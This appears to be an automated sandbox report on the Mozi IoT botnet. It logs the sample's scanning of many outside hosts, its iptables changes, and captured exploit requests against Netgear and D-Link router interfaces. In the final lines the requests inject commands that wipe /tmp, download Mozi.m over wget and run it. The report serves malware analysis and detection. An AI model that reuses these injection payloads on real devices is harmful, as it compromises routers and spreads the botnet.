Source: global traffic TCP traffic: 192.168.2.20:47760 -> 131.99.110.247:81
Source: global traffic TCP traffic: 192.168.2.20:38738 -> 3.51.62.125:8080
Source: global traffic TCP traffic: 192.168.2.20:33152 -> 28.86.70.243:8443
Source: global traffic TCP traffic: 192.168.2.20:52282 -> 171.112.221.128:8080
Source: global traffic TCP traffic: 192.168.2.20:38246 -> 85.117.188.205:8080
Source: global traffic TCP traffic: 192.168.2.20:45272 -> 105.109.18.186:49152
Source: global traffic TCP traffic: 192.168.2.20:43144 -> 29.5.215.81:37215
Source: global traffic TCP traffic: 192.168.2.20:35236 -> 8.114.30.17:8443
Source: global traffic TCP traffic: 192.168.2.20:39800 -> 4.186.238.93:7574
Source: global traffic TCP traffic: 192.168.2.20:48414 -> 85.124.222.42:49152
Source: global traffic TCP traffic: 192.168.2.20:57344 -> 13.229.32.133:7574
Source: global traffic TCP traffic: 192.168.2.20:33480 -> 138.94.203.237:49152
Source: global traffic TCP traffic: 192.168.2.20:60366 -> 84.219.17.176:8080
Source: global traffic TCP traffic: 192.168.2.20:60856 -> 165.94.66.173:49152
Source: global traffic TCP traffic: 192.168.2.20:42290 -> 163.60.176.218:8443
Source: global traffic TCP traffic: 192.168.2.20:59730 -> 174.9.64.0:37215
Source: global traffic TCP traffic: 192.168.2.20:50870 -> 217.196.154.24:52869
Source: global traffic TCP traffic: 192.168.2.20:38960 -> 43.162.206.133:7574
Source: global traffic TCP traffic: 192.168.2.20:34734 -> 79.58.62.70:8080
Source: global traffic TCP traffic: 192.168.2.20:54256 -> 180.195.241.242:49152
Source: global traffic TCP traffic: 192.168.2.20:55482 -> 113.203.125.76:49152
Source: global traffic TCP traffic: 192.168.2.20:33332 -> 124.94.21.94:8443
Source: global traffic TCP traffic: 192.168.2.20:53384 -> 125.178.212.248:81
Source: global traffic TCP traffic: 192.168.2.20:52468 -> 181.215.101.174:49152
Source: global traffic TCP traffic: 192.168.2.20:59820 -> 146.97.112.184:8080
Source: global traffic TCP traffic: 192.168.2.20:56094 -> 113.237.9.87:37215
Source: global traffic TCP traffic: 192.168.2.20:38442 -> 65.192.2.39:7574
Source: global traffic TCP traffic: 192.168.2.20:60092 -> 83.106.49.27:81
Source: global traffic TCP traffic: 192.168.2.20:56100 -> 100.221.5.250:8443
Source: global traffic TCP traffic: 192.168.2.20:57922 -> 74.164.3.48:7574
Source: global traffic TCP traffic: 192.168.2.20:39938 -> 70.83.19.226:52869
Source: global traffic TCP traffic: 192.168.2.20:55898 -> 121.204.171.153:8443
Source: global traffic TCP traffic: 192.168.2.20:49652 -> 61.114.5.135:8443
Source: global traffic TCP traffic: 192.168.2.20:59844 -> 219.13.241.116:81
Source: global traffic TCP traffic: 192.168.2.20:42368 -> 221.79.66.124:8443
Source: global traffic TCP traffic: 192.168.2.20:50640 -> 111.176.24.214:7574
Source: global traffic TCP traffic: 192.168.2.20:46158 -> 79.29.184.178:8080
Source: global traffic TCP traffic: 192.168.2.20:38326 -> 158.130.170.201:37215
Source: global traffic TCP traffic: 192.168.2.20:42426 -> 133.39.215.101:7574
Source: global traffic TCP traffic: 192.168.2.20:34400 -> 95.245.196.212:8080
Source: global traffic TCP traffic: 192.168.2.20:41906 -> 15.115.105.212:7574
Source: global traffic TCP traffic: 192.168.2.20:46340 -> 199.218.221.131:49152
Source: global traffic TCP traffic: 192.168.2.20:58966 -> 173.150.244.104:81
Source: global traffic TCP traffic: 192.168.2.20:37704 -> 157.94.79.109:5555
Source: global traffic TCP traffic: 192.168.2.20:44436 -> 137.81.200.232:5555
Source: global traffic TCP traffic: 192.168.2.20:51872 -> 101.196.228.55:81
Source: global traffic TCP traffic: 192.168.2.20:46588 -> 187.188.141.244:81
Source: global traffic TCP traffic: 192.168.2.20:40230 -> 90.205.13.29:8080
Source: global traffic TCP traffic: 192.168.2.20:58940 -> 29.150.145.46:5555
Source: global traffic TCP traffic: 192.168.2.20:41558 -> 92.77.238.132:49152
Source: global traffic TCP traffic: 192.168.2.20:58142 -> 168.120.224.251:7574
Source: global traffic TCP traffic: 192.168.2.20:50236 -> 95.75.250.127:8080
Source: global traffic TCP traffic: 192.168.2.20:32984 -> 196.95.13.165:81
Source: global traffic TCP traffic: 192.168.2.20:54874 -> 167.55.9.142:8080
Source: global traffic TCP traffic: 192.168.2.20:57612 -> 196.37.30.71:8443
Source: global traffic TCP traffic: 192.168.2.20:58382 -> 84.138.43.63:7574
Source: global traffic TCP traffic: 192.168.2.20:53924 -> 150.78.74.139:8080
Source: global traffic TCP traffic: 192.168.2.20:34402 -> 90.251.63.152:8080
Source: global traffic TCP traffic: 192.168.2.20:53456 -> 92.171.56.228:49152
Source: global traffic TCP traffic: 192.168.2.20:36200 -> 152.1.210.168:5555
Source: global traffic TCP traffic: 192.168.2.20:52424 -> 181.63.57.94:7574
Source: global traffic TCP traffic: 192.168.2.20:40720 -> 82.134.248.77:37215
Source: global traffic TCP traffic: 192.168.2.20:34142 -> 186.149.104.105:52869
Source: global traffic TCP traffic: 192.168.2.20:48984 -> 166.120.234.132:81
Source: global traffic TCP traffic: 192.168.2.20:45526 -> 148.53.105.39:37215
Source: global traffic TCP traffic: 192.168.2.20:39264 -> 34.46.25.239:52869
Source: global traffic TCP traffic: 192.168.2.20:53420 -> 122.96.117.78:8443
Source: global traffic TCP traffic: 192.168.2.20:42746 -> 2.24.204.7:5555
Source: global traffic TCP traffic: 192.168.2.20:54634 -> 206.112.48.85:8080
Source: global traffic TCP traffic: 192.168.2.20:35258 -> 221.97.211.57:81
Source: global traffic TCP traffic: 192.168.2.20:51844 -> 132.228.243.137:52869
Source: global traffic TCP traffic: 192.168.2.20:59118 -> 118.33.128.115:8080
Source: global traffic TCP traffic: 192.168.2.20:51128 -> 64.134.176.11:8080
Source: global traffic TCP traffic: 192.168.2.20:43806 -> 148.228.211.150:37215
Source: global traffic TCP traffic: 192.168.2.20:37272 -> 87.76.103.18:8080
Source: global traffic TCP traffic: 192.168.2.20:55578 -> 47.25.134.25:8443
Source: global traffic TCP traffic: 192.168.2.20:46920 -> 191.200.219.2:7574
Source: global traffic TCP traffic: 192.168.2.20:47240 -> 180.142.151.223:49152
Source: global traffic TCP traffic: 192.168.2.20:52002 -> 37.198.54.7:5555
Source: global traffic TCP traffic: 192.168.2.20:58734 -> 14.98.32.156:81
Source: global traffic TCP traffic: 192.168.2.20:39050 -> 47.238.39.43:5555
Source: global traffic TCP traffic: 192.168.2.20:34252 -> 29.198.53.231:8080
Source: global traffic TCP traffic: 192.168.2.20:59336 -> 84.49.20.203:37215
Source: global traffic TCP traffic: 192.168.2.20:39838 -> 86.146.123.31:5555
Source: global traffic TCP traffic: 192.168.2.20:59832 -> 32.217.189.23:7574
Source: global traffic TCP traffic: 192.168.2.20:47362 -> 182.150.145.27:37215
Source: global traffic TCP traffic: 192.168.2.20:42540 -> 37.25.2.203:8443
Source: global traffic TCP traffic: 192.168.2.20:34066 -> 146.53.108.229:7574
Source: global traffic TCP traffic: 192.168.2.20:38360 -> 167.105.144.22:7574
Source: global traffic TCP traffic: 192.168.2.20:60418 -> 132.254.4.175:8443
Source: global traffic TCP traffic: 192.168.2.20:43554 -> 96.186.107.158:52869
Source: global traffic TCP traffic: 192.168.2.20:35612 -> 54.87.34.198:5555
Source: global traffic TCP traffic: 192.168.2.20:45608 -> 24.87.139.212:37215
Source: global traffic TCP traffic: 192.168.2.20:51162 -> 23.95.18.129:7574
Source: global traffic TCP traffic: 192.168.2.20:56194 -> 193.223.49.13:81
Source: global traffic TCP traffic: 192.168.2.20:34122 -> 80.223.16.203:7574
Source: global traffic TCP traffic: 192.168.2.20:37600 -> 149.88.110.90:7574
Source: global traffic TCP traffic: 192.168.2.20:49262 -> 183.182.79.172:7574
Source: global traffic TCP traffic: 192.168.2.20:56704 -> 82.179.61.132:8080
Source: global traffic TCP traffic: 192.168.2.20:52170 -> 185.32.224.106:8080
Source: global traffic TCP traffic: 192.168.2.20:51884 -> 4.122.58.30:37215
Source: global traffic TCP traffic: 192.168.2.20:38142 -> 171.156.169.94:8443
Source: global traffic TCP traffic: 192.168.2.20:50394 -> 189.124.245.91:37215
Source: global traffic TCP traffic: 192.168.2.20:40552 -> 137.33.28.160:52869
Source: global traffic TCP traffic: 192.168.2.20:46764 -> 160.49.32.226:49152
Source: global traffic TCP traffic: 192.168.2.20:49828 -> 77.188.2.23:49152
Source: global traffic TCP traffic: 192.168.2.20:60188 -> 39.70.239.74:8443
Source: global traffic TCP traffic: 192.168.2.20:38156 -> 153.251.110.103:8080
Source: global traffic TCP traffic: 192.168.2.20:37816 -> 6.158.170.206:49152
Source: global traffic TCP traffic: 192.168.2.20:44044 -> 102.239.181.86:8443
Source: global traffic TCP traffic: 192.168.2.20:51112 -> 138.244.0.154:8080
Source: global traffic TCP traffic: 192.168.2.20:50090 -> 56.89.187.128:52869
Source: global traffic TCP traffic: 192.168.2.20:38736 -> 193.74.200.139:8080
Source: global traffic TCP traffic: 192.168.2.20:49988 -> 50.160.226.168:5555
Source: global traffic TCP traffic: 192.168.2.20:32842 -> 93.58.202.130:7574
Source: global traffic TCP traffic: 192.168.2.20:52204 -> 65.114.175.95:81
Source: global traffic TCP traffic: 192.168.2.20:49222 -> 201.144.37.239:7574
Source: global traffic TCP traffic: 192.168.2.20:39886 -> 153.215.244.192:8080
Source: global traffic TCP traffic: 192.168.2.20:55388 -> 177.16.24.154:8080
Source: global traffic TCP traffic: 192.168.2.20:58490 -> 26.139.153.168:37215
Source: global traffic TCP traffic: 192.168.2.20:54464 -> 193.215.254.49:5555
Source: global traffic TCP traffic: 192.168.2.20:45310 -> 9.244.6.205:5555
Source: global traffic TCP traffic: 192.168.2.20:45620 -> 126.17.192.94:8443
Source: global traffic TCP traffic: 192.168.2.20:55314 -> 89.246.214.5:81
Source: global traffic TCP traffic: 192.168.2.20:38496 -> 113.178.32.186:7574
Source: global traffic TCP traffic: 192.168.2.20:42012 -> 22.111.96.211:8443
Source: global traffic TCP traffic: 192.168.2.20:55546 -> 129.177.173.85:52869
Source: global traffic TCP traffic: 192.168.2.20:51724 -> 194.45.74.136:8080
Source: global traffic TCP traffic: 192.168.2.20:52062 -> 217.175.214.110:8080
Source: global traffic TCP traffic: 192.168.2.20:52990 -> 185.57.154.59:49152
Source: global traffic TCP traffic: 192.168.2.20:56420 -> 103.119.246.183:8080
Source: global traffic TCP traffic: 192.168.2.20:56202 -> 210.7.21.57:8080
Source: global traffic TCP traffic: 192.168.2.20:39758 -> 46.254.1.124:52869
Source: global traffic TCP traffic: 192.168.2.20:46990 -> 83.190.231.93:37215
Source: global traffic TCP traffic: 192.168.2.20:39368 -> 24.209.150.53:8080
Source: global traffic TCP traffic: 192.168.2.20:60754 -> 14.106.178.189:52869
Source: global traffic TCP traffic: 192.168.2.20:57620 -> 21.1.86.6:8080
Source: global traffic TCP traffic: 192.168.2.20:54840 -> 29.210.78.250:8080
Source: global traffic TCP traffic: 192.168.2.20:51062 -> 9.214.29.162:8080
Source: global traffic TCP traffic: 192.168.2.20:52094 -> 59.238.28.165:8080
Source: global traffic TCP traffic: 192.168.2.20:33122 -> 23.136.108.3:5555
Source: global traffic TCP traffic: 192.168.2.20:52764 -> 39.150.243.95:8080
Source: global traffic TCP traffic: 192.168.2.20:58240 -> 95.235.124.24:8080
Source: global traffic TCP traffic: 192.168.2.20:37498 -> 162.248.240.36:8080
Source: global traffic TCP traffic: 192.168.2.20:49178 -> 37.192.71.218:8080
Source: global traffic TCP traffic: 192.168.2.20:60294 -> 203.154.69.97:8080
Source: global traffic TCP traffic: 192.168.2.20:44870 -> 26.95.223.242:49152
Source: global traffic TCP traffic: 192.168.2.20:49784 -> 207.209.5.215:81
Source: global traffic TCP traffic: 192.168.2.20:35608 -> 65.18.49.14:5555
Source: global traffic TCP traffic: 192.168.2.20:56108 -> 160.116.99.47:52869
Source: global traffic TCP traffic: 192.168.2.20:57424 -> 207.36.97.217:8080
Source: global traffic TCP traffic: 192.168.2.20:60416 -> 126.241.242.120:37215
Source: global traffic TCP traffic: 192.168.2.20:45724 -> 180.222.24.104:5555
Source: global traffic TCP traffic: 192.168.2.20:34852 -> 1.249.43.22:8080
Source: global traffic TCP traffic: 192.168.2.20:33926 -> 113.37.245.122:49152
Source: global traffic TCP traffic: 192.168.2.20:43820 -> 83.26.49.216:8080
Source: global traffic TCP traffic: 192.168.2.20:53818 -> 218.1.134.21:49152
Source: global traffic TCP traffic: 192.168.2.20:36190 -> 94.202.222.110:52869
Source: global traffic TCP traffic: 192.168.2.20:55414 -> 163.224.207.250:37215
Source: global traffic TCP traffic: 192.168.2.20:50874 -> 165.192.86.199:8080
Source: global traffic TCP traffic: 192.168.2.20:47924 -> 47.97.84.96:5555
Source: global traffic TCP traffic: 192.168.2.20:36000 -> 98.76.121.141:8443
Source: global traffic TCP traffic: 192.168.2.20:56512 -> 5.253.168.79:8080
Source: global traffic TCP traffic: 192.168.2.20:60868 -> 159.199.114.171:7574
Source: global traffic TCP traffic: 192.168.2.20:42254 -> 21.186.96.232:8080
Source: global traffic TCP traffic: 192.168.2.20:52564 -> 63.193.129.128:8080
Source: global traffic TCP traffic: 192.168.2.20:48530 -> 142.143.222.228:49152
Source: global traffic TCP traffic: 192.168.2.20:45344 -> 159.117.140.27:5555
Source: global traffic TCP traffic: 192.168.2.20:43498 -> 159.162.153.137:37215
Source: global traffic TCP traffic: 192.168.2.20:53998 -> 93.191.87.190:8080
Source: global traffic TCP traffic: 192.168.2.20:50786 -> 108.222.27.30:7574
Source: global traffic TCP traffic: 192.168.2.20:56256 -> 69.247.179.164:8080
Source: global traffic TCP traffic: 192.168.2.20:42292 -> 17.188.17.96:8443
Source: global traffic TCP traffic: 192.168.2.20:38076 -> 120.218.153.188:5555
Source: global traffic TCP traffic: 192.168.2.20:40178 -> 177.237.69.156:8443
Source: global traffic TCP traffic: 192.168.2.20:34046 -> 116.13.184.201:8080
Source: global traffic TCP traffic: 192.168.2.20:33188 -> 121.120.108.73:8080
Source: global traffic TCP traffic: 192.168.2.20:51562 -> 18.24.141.168:7574
Source: global traffic TCP traffic: 192.168.2.20:39098 -> 166.55.57.24:8080
Source: global traffic TCP traffic: 192.168.2.20:38220 -> 24.105.81.145:81
Source: global traffic TCP traffic: 192.168.2.20:52676 -> 61.67.234.110:49152
Source: global traffic TCP traffic: 192.168.2.20:46246 -> 124.22.25.41:7574
Source: global traffic TCP traffic: 192.168.2.20:57714 -> 90.85.134.44:81
Source: global traffic TCP traffic: 192.168.2.20:53760 -> 77.25.98.191:81
Source: global traffic TCP traffic: 192.168.2.20:34962 -> 197.167.218.125:8080
Source: global traffic TCP traffic: 192.168.2.20:40784 -> 76.209.219.87:8443
Source: global traffic TCP traffic: 192.168.2.20:46100 -> 69.110.51.44:8443
Source: global traffic TCP traffic: 192.168.2.20:55020 -> 147.139.103.203:7574
Source: global traffic TCP traffic: 192.168.2.20:51804 -> 170.147.88.37:81
Source: global traffic TCP traffic: 192.168.2.20:34932 -> 21.229.198.23:7574
Source: global traffic TCP traffic: 192.168.2.20:32774 -> 47.83.189.211:37215
Source: global traffic TCP traffic: 192.168.2.20:47434 -> 119.97.159.234:81
Source: global traffic TCP traffic: 192.168.2.20:57750 -> 142.66.89.80:8080
Source: global traffic TCP traffic: 192.168.2.20:54354 -> 5.182.95.91:8443
Source: global traffic TCP traffic: 192.168.2.20:50732 -> 204.7.247.28:52869
Source: global traffic TCP traffic: 192.168.2.20:59964 -> 77.190.22.139:49152
Source: global traffic TCP traffic: 192.168.2.20:56096 -> 137.38.149.182:8080
Source: global traffic TCP traffic: 192.168.2.20:35162 -> 173.27.94.3:8080
Source: global traffic TCP traffic: 192.168.2.20:47922 -> 18.119.229.111:5555
Source: global traffic TCP traffic: 192.168.2.20:33810 -> 91.97.247.73:5555
Source: global traffic TCP traffic: 192.168.2.20:41594 -> 71.132.177.20:8080
Source: global traffic TCP traffic: 192.168.2.20:34350 -> 157.100.221.142:7574
Source: global traffic TCP traffic: 192.168.2.20:36164 -> 152.39.226.53:7574
Source: global traffic TCP traffic: 192.168.2.20:37252 -> 25.97.66.170:8080
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 34.30.246.129:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 72.193.100.130:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 191.130.205.66:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 168.204.132.3:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 135.234.161.92:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 112.246.212.82:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.200.2.58:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 110.14.87.91:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 69.122.31.78:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 128.13.11.190:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 63.34.109.151:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 207.13.36.47:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 117.25.72.12:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.218.11.121:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 117.134.250.209:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 58.128.23.30:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 13.201.155.93:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 18.115.11.94:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 156.48.180.246:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 182.202.90.106:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 195.166.0.203:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 184.155.146.118:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 76.87.157.247:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.161.28.140:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 106.45.219.74:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 74.210.56.125:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 113.24.69.141:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 144.65.254.202:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.86.72.178:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 212.86.101.169:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 156.167.187.20:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 110.180.211.39:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 105.250.71.183:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 113.117.19.31:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 190.79.231.15:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 216.51.208.52:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 219.250.235.42:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 101.228.8.80:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 188.156.60.139:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 20.53.214.183:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 109.102.41.71:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 38.185.158.237:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 161.185.182.176:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 155.94.214.223:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 171.229.255.155:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 59.170.49.101:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 76.18.135.232:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 87.46.40.109:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 194.99.193.132:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.139.243.212:2323
Source: global traffic TCP traffic: 192.168.2.20:55946 -> 204.109.84.136:81
Source: global traffic TCP traffic: 192.168.2.20:35348 -> 31.193.226.180:8080
Source: global traffic TCP traffic: 192.168.2.20:54052 -> 44.10.103.216:5555
Source: global traffic TCP traffic: 192.168.2.20:57812 -> 93.181.246.124:5555
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 154.6.180.223:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 141.139.80.101:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 2.230.195.56:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 223.97.173.137:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 217.240.242.190:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 203.83.23.203:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 79.208.167.77:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 42.145.28.245:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 65.31.148.132:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 47.122.79.104:2323
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4616) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4650) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4653) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4690) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4716) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4748) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4796) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4805) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4829) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4878) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4906) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4926) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4931) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4947) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4974) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5000) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5021) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5025) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5034) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5057) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5087) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5117) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5120) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5127) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5182) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
Source: /bin/sh (PID: 5231) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5234) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 121.5.104.125:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 164.125.103.242:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 